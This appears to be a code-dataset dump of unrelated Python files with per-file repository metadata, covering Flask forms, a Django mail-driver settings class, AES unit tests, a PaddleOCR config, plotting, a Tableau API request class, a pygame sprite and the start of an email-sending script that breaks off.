self.assertEqual(ExtensibleEnumeration.c.value, 3)
def test_enum_registry_fail(self):
with self.assertRaises(TypeError):
@registry.extensible_enum
class NotAnEnum(object):
pass
if __name__ == '__main__':
unittest.main()
| 29.479452
| 89
| 0.697955
| 220
| 2,152
| 6.704545
| 0.290909
| 0.135593
| 0.109831
| 0.065085
| 0.380339
| 0.357288
| 0.295593
| 0.143729
| 0.143729
| 0.143729
| 0
| 0.012419
| 0.214219
| 2,152
| 72
| 90
| 29.888889
| 0.859846
| 0.033922
| 0
| 0.352941
| 0
| 0
| 0.004333
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 1
| 0.137255
| false
| 0.117647
| 0.058824
| 0
| 0.392157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a3245f4587a32c402e78f398ab94bc52ef0cf9a
| 780
|
py
|
Python
|
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class Config(object):
pass
def read_params():
cfg = Config()
#params for text detector
cfg.det_algorithm = "DB"
cfg.det_model_dir = "./inference/ch_ppocr_mobile_v2.0_det_infer/"
cfg.det_limit_side_len = 960
cfg.det_limit_type = 'max'
#DB parmas
cfg.det_db_thresh = 0.3
cfg.det_db_box_thresh = 0.5
cfg.det_db_unclip_ratio = 1.6
cfg.use_dilation = False
# #EAST parmas
# cfg.det_east_score_thresh = 0.8
# cfg.det_east_cover_thresh = 0.1
# cfg.det_east_nms_thresh = 0.2
cfg.use_pdserving = False
cfg.use_tensorrt = False
return cfg
| 22.285714
| 70
| 0.661538
| 116
| 780
| 4.034483
| 0.508621
| 0.128205
| 0.102564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030822
| 0.251282
| 780
| 34
| 71
| 22.941176
| 0.770548
| 0.203846
| 0
| 0
| 0
| 0
| 0.083045
| 0.074394
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.055556
| 0.166667
| 0
| 0.333333
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a455ca53b609476797038c96b21d969bbdf51e3
| 2,234
|
py
|
Python
|
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
import datetime
from flask_wtf import FlaskForm
from wtforms import (
StringField,
TextAreaField,
DateTimeField,
HiddenField,
PasswordField,
)
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo
class NullableDateTimeField(DateTimeField):
"""Modify DateField to allow for Null values"""
def process_formdata(self, valuelist):
# Bypasses wtForms validation for blank datetime field.
if valuelist:
date_str = " ".join(valuelist).strip()
if date_str == "":
self.data = None
return
try:
self.data = datetime.datetime.strptime(date_str, self.format)
except ValueError:
self.data = None
raise ValueError(self.gettext("Not a valid date value"))
class SearchForm(FlaskForm):
search = StringField("Search", validators=[DataRequired()])
class ReviewForm(FlaskForm):
rating = HiddenField("Rating", validators=[DataRequired()])
review_title = StringField("Headline")
review_content = TextAreaField("Review")
date_started = NullableDateTimeField("Date Started", format="%m/%d/%Y")
date_finished = NullableDateTimeField("Date Finished", format="%m/%d/%Y")
def validate_date_finished(self, date_finished):
if self.date_started.data and date_finished.data:
if self.date_started.data > date_finished.data:
print("Date finished must be greater than or equal to date started")
raise ValidationError(
"Date finished must be greater than or equal to date started."
)
elif self.date_started.data or date_finished.data:
print("missing date")
raise ValidationError("If setting read dates, both dates are required.")
class EditProfileForm(FlaskForm):
display_name = StringField("Name", validators=[])
email = StringField("Email", validators=[Email(message="Invalid Email Address.")])
password = PasswordField(
"Password",
validators=[EqualTo("confirm_password", message="Passwords must match.")],
)
confirm_password = PasswordField("Confirm Password", validators=[])
| 36.032258
| 86
| 0.658013
| 230
| 2,234
| 6.3
| 0.408696
| 0.074534
| 0.031056
| 0.039337
| 0.096618
| 0.067633
| 0.067633
| 0.067633
| 0.067633
| 0.067633
| 0
| 0
| 0.243957
| 2,234
| 61
| 87
| 36.622951
| 0.857904
| 0.042972
| 0
| 0.041667
| 0
| 0
| 0.168856
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.104167
| 0.083333
| 0
| 0.4375
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a84ca10fd051b6b0bb8be0088246cc71958f9d5
| 12,062
|
py
|
Python
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 9
|
2020-03-25T07:51:47.000Z
|
2022-02-07T00:07:28.000Z
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 1,164
|
2021-01-28T23:16:11.000Z
|
2022-03-28T07:23:10.000Z
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 25
|
2020-03-17T06:48:30.000Z
|
2022-02-15T15:13:44.000Z
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
MAILアクション用画面表示補助クラス
"""
import pytz
import datetime
import json
import socket
import traceback
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.db import transaction
from django.conf import settings
from libs.commonlibs import define as defs
from libs.commonlibs.oase_logger import OaseLogger
from libs.commonlibs.aes_cipher import AESCipher
from web_app.models.models import ActionType
from web_app.models.mail_models import MailDriver
from web_app.templatetags.common import get_message
from web_app.serializers.unicode_check import UnicodeCheck
logger = OaseLogger.get_instance() # ロガー初期化
class mailDriverInfo():
def __init__(self, drv_id, act_id, name, ver, icon_name):
self.drv_id = drv_id
self.act_id = act_id
self.name = name
self.ver = ver
self.icon_name = icon_name
def __str__(self):
return '%s(ver%s)' % (self.name, self.ver)
def get_driver_name(self):
return '%s Driver ver%s' % (self.name, self.ver)
def get_driver_id(self):
return self.drv_id
def get_icon_name(self):
return self.icon_name
@classmethod
def get_template_file(cls):
return 'system/mail/action_mail.html'
@classmethod
def get_info_list(cls, user_groups):
try:
mail_driver_obj_list = MailDriver.objects.all()
except Exception as e:
# ここでの例外は大外で拾う
raise
protocol_dict = cls.get_define()['dict']
mail_driver_dto_list = []
cipher = AESCipher(settings.AES_KEY)
for mail_obj in mail_driver_obj_list:
mail_info = mail_obj.__dict__
if mail_obj.password:
mail_info['password'] = cipher.decrypt(mail_obj.password)
mail_info['protocol_str'] = protocol_dict[mail_obj.protocol]
mail_driver_dto_list.append(mail_info)
return mail_driver_dto_list
@classmethod
def get_group_list(cls, user_groups):
"""
[概要]
グループ一覧を取得する(システム管理グループを除く)
"""
return []
@classmethod
def get_define(cls):
protocol_dict = {key_value['v']: key_value['k'] for key_value in defs.SMTP_PROTOCOL.LIST_ALL}
defines = {
'list_all': defs.SMTP_PROTOCOL.LIST_ALL,
'dict': protocol_dict,
}
return defines
def record_lock(self, json_str, request):
logger.logic_log('LOSI00001', 'None', request=request)
driver_id = self.get_driver_id()
# 更新前にレコードロック
if json_str['json_str']['ope'] in (defs.DABASE_OPECODE.OPE_UPDATE, defs.DABASE_OPECODE.OPE_DELETE):
drvinfo_modify = int(json_str['json_str']['mail_driver_id'])
MailDriver.objects.select_for_update().filter(pk=drvinfo_modify)
logger.logic_log('LOSI00002', 'Record locked.(driver_id=%s)' % driver_id, request=request)
def modify(self, json_str, request):
"""
[メソッド概要]
グループのDB更新処理
"""
logger.logic_log('LOSI00001', 'None', request=request)
error_flag = False
error_msg = {
'mail_disp_name' : '',
'protocol' : '',
'smtp_server' : '',
'port' : '',
'user' : '',
'password' : '',
}
now = datetime.datetime.now(pytz.timezone('UTC'))
emo_chk = UnicodeCheck()
# 成功時データ
response = {"status": "success",}
try:
rq = json_str['json_str']
ope = int(rq['ope'])
#削除以外の場合の入力チェック
if ope != defs.DABASE_OPECODE.OPE_DELETE:
error_flag = self._validate(rq, error_msg, request)
if error_flag:
raise UserWarning('validation error.')
# パスワードを暗号化 空なら空文字
cipher = AESCipher(settings.AES_KEY)
if ope == defs.DABASE_OPECODE.OPE_UPDATE:
encrypted_password = cipher.encrypt(rq['password']) if rq['password'] else ''
driver_info_mod = MailDriver.objects.get(mail_driver_id=rq['mail_driver_id'])
driver_info_mod.mail_disp_name = rq['mail_disp_name']
driver_info_mod.protocol = rq['protocol']
driver_info_mod.smtp_server = rq['smtp_server']
driver_info_mod.port = rq['port']
driver_info_mod.user = rq['user']
driver_info_mod.password = encrypted_password
driver_info_mod.last_update_user = request.user.user_name
driver_info_mod.last_update_timestamp = now
driver_info_mod.save(force_update=True)
elif ope == defs.DABASE_OPECODE.OPE_DELETE:
MailDriver.objects.filter(pk=rq['mail_driver_id']).delete()
elif ope == defs.DABASE_OPECODE.OPE_INSERT:
encrypted_password = cipher.encrypt(rq['password']) if rq['password'] else ''
driver_info_reg = MailDriver(
mail_disp_name = rq['mail_disp_name'],
protocol = rq['protocol'],
smtp_server = rq['smtp_server'],
port = rq['port'],
user = rq['user'],
password = encrypted_password,
last_update_user = request.user.user_name,
last_update_timestamp = now
).save(force_insert=True)
except MailDriver.DoesNotExist:
logger.logic_log('LOSM07006', "mail_driver_id", mail_driver_id, request=request)
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response = {
'status': 'failure',
'error_msg': error_msg, # エラー詳細(エラーアイコンで出す)
}
logger.logic_log('LOSI00002', 'response=%s' % response, request=request)
return response
def _validate(self, rq, error_msg, request):
"""
[概要]
入力チェック
[引数]
rq: dict リクエストされた入力データ
error_msg: dict
[戻り値]
"""
logger.logic_log('LOSI00001', 'data: %s, error_msg:%s'%(rq, error_msg))
error_flag = False
emo_chk = UnicodeCheck()
emo_flag = False
emo_flag_ita_disp_name = False
emo_flag_hostname = False
if len(rq['mail_disp_name']) == 0:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27201', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'mail_disp_name', request=request)
if len(rq['mail_disp_name']) > 64:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27202', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'mail_disp_name', 64, rq['mail_disp_name'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['mail_disp_name'])
if len(value_list) > 0:
error_flag = True
emo_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27216', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['protocol']) == 0:
error_flag = True
error_msg['protocol'] += get_message('MOSJA27212', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'protocol', request=request)
if len(rq['protocol']) > 64:
error_flag = True
error_msg['protocol'] += get_message('MOSJA27213', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'protocol', 64, rq['protocol'], request=request)
if len(rq['smtp_server']) == 0:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27203', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'smtp_server', request=request)
if len(rq['smtp_server']) > 128:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27204', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'smtp_server', 64, rq['smtp_server'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['smtp_server'])
if len(value_list) > 0:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27217', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['port']) == 0:
error_flag = True
error_msg['port'] += get_message('MOSJA27205', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'port', request=request)
try:
tmp_port = int(rq['port'])
if 0 > tmp_port or tmp_port > 65535:
error_flag = True
error_msg['port'] += get_message('MOSJA27206', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07003', 'port', rq['port'], request=request)
except ValueError:
error_flag = True
error_msg['port'] += get_message('MOSJA27206', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07003', 'port', rq['port'], request=request)
if len(rq['user']) > 64:
error_flag = True
error_msg['user'] += get_message('MOSJA27207', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'user', 64, rq['user'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['user'])
if len(value_list) > 0:
error_flag = True
error_msg['user'] += get_message('MOSJA27218', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['password']) > 64:
error_flag = True
error_msg['password'] += get_message('MOSJA27208', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'password', 64, rq['password'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['password'])
if len(value_list) > 0:
error_flag = True
error_msg['password'] += get_message('MOSJA27219', request.user.get_lang_mode(), showMsgId=False) + '\n'
if not emo_flag:
duplication = MailDriver.objects.filter(mail_disp_name=rq['mail_disp_name'])
if len(duplication) == 1 and int(rq['mail_driver_id']) != duplication[0].mail_driver_id:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27209', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07004', 'mail_disp_name', rq['mail_disp_name'], request=request)
if error_flag == False:
# 疎通確認
resp_code = -1
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
resp_code = sock.connect_ex((rq['smtp_server'], int(rq['port']))) # host名名前解決が必要/etc/hostsとか
sock.close()
except Exception as e:
pass
if resp_code != 0:
error_flag = True
#todo 仮でこのエラーは名前に入れている
error_msg['mail_disp_name'] += get_message('MOSJA27215', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07005', rq['smtp_server'], rq['port'], request=request)
return error_flag
| 35.372434
| 122
| 0.596419
| 1,433
| 12,062
| 4.750174
| 0.193999
| 0.029382
| 0.035258
| 0.044954
| 0.418834
| 0.367563
| 0.327163
| 0.276627
| 0.240341
| 0.20332
| 0
| 0.026942
| 0.286105
| 12,062
| 340
| 123
| 35.476471
| 0.763558
| 0.072293
| 0
| 0.212963
| 0
| 0
| 0.122767
| 0.004443
| 0
| 0
| 0
| 0.002941
| 0
| 1
| 0.055556
| false
| 0.060185
| 0.074074
| 0.023148
| 0.180556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
76d4b9d4643322713c59c30a22d968f034c3d591
| 2,361
|
py
|
Python
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 32
|
2021-01-18T03:52:17.000Z
|
2022-02-17T20:43:39.000Z
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 12
|
2021-02-06T08:12:08.000Z
|
2021-12-11T23:17:41.000Z
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 6
|
2021-01-29T16:46:31.000Z
|
2022-01-20T18:40:03.000Z
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from haruhi_dl.aes import aes_decrypt, aes_encrypt, aes_cbc_decrypt, aes_cbc_encrypt, aes_decrypt_text
from haruhi_dl.utils import bytes_to_intlist, intlist_to_bytes
import base64
# the encrypted data can be generate with 'devscripts/generate_aes_testdata.py'
class TestAES(unittest.TestCase):
def setUp(self):
self.key = self.iv = [0x20, 0x15] + 14 * [0]
self.secret_msg = b'Secret message goes here'
def test_encrypt(self):
msg = b'message'
key = list(range(16))
encrypted = aes_encrypt(bytes_to_intlist(msg), key)
decrypted = intlist_to_bytes(aes_decrypt(encrypted, key))
self.assertEqual(decrypted, msg)
def test_cbc_decrypt(self):
data = bytes_to_intlist(
b"\x97\x92+\xe5\x0b\xc3\x18\x91ky9m&\xb3\xb5@\xe6'\xc2\x96.\xc8u\x88\xab9-[\x9e|\xf1\xcd"
)
decrypted = intlist_to_bytes(aes_cbc_decrypt(data, self.key, self.iv))
self.assertEqual(decrypted.rstrip(b'\x08'), self.secret_msg)
def test_cbc_encrypt(self):
data = bytes_to_intlist(self.secret_msg)
encrypted = intlist_to_bytes(aes_cbc_encrypt(data, self.key, self.iv))
self.assertEqual(
encrypted,
b"\x97\x92+\xe5\x0b\xc3\x18\x91ky9m&\xb3\xb5@\xe6'\xc2\x96.\xc8u\x88\xab9-[\x9e|\xf1\xcd")
def test_decrypt_text(self):
password = intlist_to_bytes(self.key).decode('utf-8')
encrypted = base64.b64encode(
intlist_to_bytes(self.iv[:8])
+ b'\x17\x15\x93\xab\x8d\x80V\xcdV\xe0\t\xcdo\xc2\xa5\xd8ksM\r\xe27N\xae'
).decode('utf-8')
decrypted = (aes_decrypt_text(encrypted, password, 16))
self.assertEqual(decrypted, self.secret_msg)
password = intlist_to_bytes(self.key).decode('utf-8')
encrypted = base64.b64encode(
intlist_to_bytes(self.iv[:8])
+ b'\x0b\xe6\xa4\xd9z\x0e\xb8\xb9\xd0\xd4i_\x85\x1d\x99\x98_\xe5\x80\xe7.\xbf\xa5\x83'
).decode('utf-8')
decrypted = (aes_decrypt_text(encrypted, password, 32))
self.assertEqual(decrypted, self.secret_msg)
if __name__ == '__main__':
unittest.main()
| 36.890625
| 102
| 0.671326
| 339
| 2,361
| 4.448378
| 0.368732
| 0.047745
| 0.074271
| 0.047745
| 0.451592
| 0.351459
| 0.302387
| 0.259947
| 0.259947
| 0.193634
| 0
| 0.063158
| 0.195256
| 2,361
| 63
| 103
| 37.47619
| 0.730526
| 0.051249
| 0
| 0.212766
| 0
| 0.085106
| 0.171658
| 0.143496
| 0
| 0
| 0.003576
| 0
| 0.106383
| 1
| 0.106383
| false
| 0.085106
| 0.148936
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
76ebcd294c425806f2a19ba5ab050dfad80e8987
| 826
|
py
|
Python
|
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import os
import contorno
from constantes import INTERVALOS, PASSOS, TAMANHO_BARRA, DELTA_T, DELTA_X
z_temp = contorno.p_3
TAMANHO_BARRA = 2
x = np.linspace(0.0, TAMANHO_BARRA, INTERVALOS+1)
y = np.linspace(0.0, DELTA_T, PASSOS+1)
z = []
for k in range(PASSOS+1):
z_k = np.copy(z_temp)
z.append(z_k)
for i in range(1, INTERVALOS):
z_temp[i] = z_k[i] + (DELTA_T/(DELTA_X**2)) * (z_k[i+1]-2*z_k[i]+z_k[i-1])
z = np.asarray(z)
x, y = np.meshgrid(x, y)
fig = plt.figure()
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm, antialiased=False)
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('T(x,t)')
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
| 22.944444
| 82
| 0.692494
| 160
| 826
| 3.43125
| 0.39375
| 0.021858
| 0.021858
| 0.043716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02845
| 0.14891
| 826
| 35
| 83
| 23.6
| 0.752489
| 0
| 0
| 0
| 0
| 0
| 0.012107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.259259
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a03cda07d112635217a5bbdc7ec5274c0658a7a
| 3,258
|
py
|
Python
|
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | 1
|
2019-06-08T22:19:40.000Z
|
2019-06-08T22:19:40.000Z
|
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | null | null | null |
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | null | null | null |
from .BaseRequest import BaseRequest
class UpdateWorkbookConnectionRequest(BaseRequest):
"""
Update workbook connection request for sending API requests to Tableau Server.
:param ts_connection: The Tableau Server connection object.
:type ts_connection: class
:param server_address: The new server for the connection.
:type server_address: string
:param port: The new port for the connection.
:type port: string
:param connection_username: The new username for the connection.
:type connection_username: string
:param connection_password: The new password for the connection.
:type connection_password: string
:param embed_password_flag: Boolean; True to embed the password in the connection, False otherwise.
:type embed_password_flag: boolean
"""
def __init__(self,
ts_connection,
server_address=None,
port=None,
connection_username=None,
connection_password=None,
embed_password_flag=None):
super().__init__(ts_connection)
self._server_address = server_address
self._port = port
self._connection_username = connection_username
self._connection_password = connection_password
self._embed_password_flag = embed_password_flag
self.base_update_workbook_connection_request
@property
def optional_parameter_keys(self):
return [
'serverAddress',
'serverPort',
'userName',
'password',
'embedPassword'
]
@property
def optional_parameter_values_exist(self):
return [
self._server_address,
self._port,
self._connection_username,
self._connection_password,
True if self._embed_password_flag is not None else None
]
@property
def optional_parameter_values(self):
return [
self._server_address,
self._port,
self._connection_username,
self._connection_password,
self._embed_password_flag
]
@property
def base_update_workbook_connection_request(self):
self._request_body.update({'connection': {}})
return self._request_body
@property
def modified_update_workbook_connection_request(self):
if any(self.optional_parameter_values_exist):
self._request_body['connection'].update(
self._get_parameters_dict(self.optional_parameter_keys,
self.optional_parameter_values))
return self._request_body
@staticmethod
def _get_parameters_dict(param_keys, param_values):
"""Override the inherited _get_parameters_dict() method to allow passing boolean values directly"""
params_dict = {}
for i, key in enumerate(param_keys):
if param_values[i] is not None:
params_dict.update({key: param_values[i]})
return params_dict
def get_request(self):
return self.modified_update_workbook_connection_request
| 36.2
| 107
| 0.634131
| 331
| 3,258
| 5.885196
| 0.214502
| 0.046715
| 0.061088
| 0.079569
| 0.297228
| 0.11191
| 0.081109
| 0.081109
| 0.081109
| 0.081109
| 0
| 0
| 0.305402
| 3,258
| 89
| 108
| 36.606742
| 0.860804
| 0.261203
| 0
| 0.285714
| 0
| 0
| 0.030796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126984
| false
| 0.15873
| 0.015873
| 0.063492
| 0.269841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a1cc533cda21da8b86ba8309652b8179ef12637
| 1,371
|
py
|
Python
|
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | 1
|
2022-02-01T04:05:04.000Z
|
2022-02-01T04:05:04.000Z
|
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | null | null | null |
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | null | null | null |
import pygame
import shared
class Explosion():
def __init__(self, images:list, centre:tuple, key:str) -> None:
''' Class variables. key: 'sm', 'lg', 'player '''
self.images = images # list of 8 images
self.centre = centre # use for all frames
self.key = key # key used later
self.image = images[key][0] # set to first image in the sequence
self.rect = self.image.get_rect() # define rectangle from image size
self.rect.center = self.centre # set centre for all frames
self.frame = 0 # no of first frame
self.time_passed = 0 # set timer to 0
self.frame_rate = 0.1 # 8 images played at 1 frame per 0.1 secs = 0.8 seconds
self.active = True
def update(self, dt):
self.time_passed += dt
if self.time_passed >= self.frame_rate: # 0.1 seconds has passed
self.time_passed = 0 # reset timer
self.frame += 1 # increase frame number
if self.frame >= len(self.images[self.key]): # check if end of list?
self.active = False # animation finished
else:
self.image = self.images[self.key][self.frame] # next frame
self.rect = self.image.get_rect() # new rectangle
self.rect.center = self.centre # set centre to parameter value
return self.active
def draw(self):
shared.screen.blit(self.image, self.rect) # draw current frame
| 41.545455
| 84
| 0.644055
| 206
| 1,371
| 4.228155
| 0.383495
| 0.061998
| 0.064294
| 0.036739
| 0.165327
| 0.130884
| 0.075775
| 0
| 0
| 0
| 0
| 0.016569
| 0.251641
| 1,371
| 33
| 85
| 41.545455
| 0.832359
| 0.326039
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0.142857
| 0.071429
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a2ad964a50ee086e447a623b3863c7fbb9ef26a
| 1,977
|
py
|
Python
|
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on 2016年8月10日
@author: Administrator
'''
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.multipart import MIMEBase
from email.utils import parseaddr, formataddr
import smtplib
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), addr))
from_addr = 'leeo1124@163.com'#input('From: ')
password = input('Password: ')
to_addr = '450475851@qq.com'#input('To: ')
smtp_server = 'smtp.163.com'#input('SMTP server: ')
# 发送纯文本邮件
